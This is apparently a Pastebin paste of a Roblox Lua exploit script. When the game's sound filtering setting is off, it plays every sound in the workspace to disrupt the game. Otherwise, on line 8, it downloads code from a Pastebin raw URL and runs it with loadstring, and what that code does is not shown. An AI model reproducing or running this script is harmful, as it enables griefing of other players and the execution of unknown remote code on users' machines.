Advertisement
Guest User

Untitled

a guest
Feb 20th, 2020
142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. if game.SoundService.RespectFilteringEnabled == false then
  2. for i,v in pairs(game.Workspace:GetDescendants()) do
  3. if v:IsA("Sound") then
  4. v:Play()
  5. end
  6. end
  7. else
  8. loadstring(game:HttpGetAsync("https://pastebin.com/raw/Ts8TSAZN", 0, true))()
  9. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement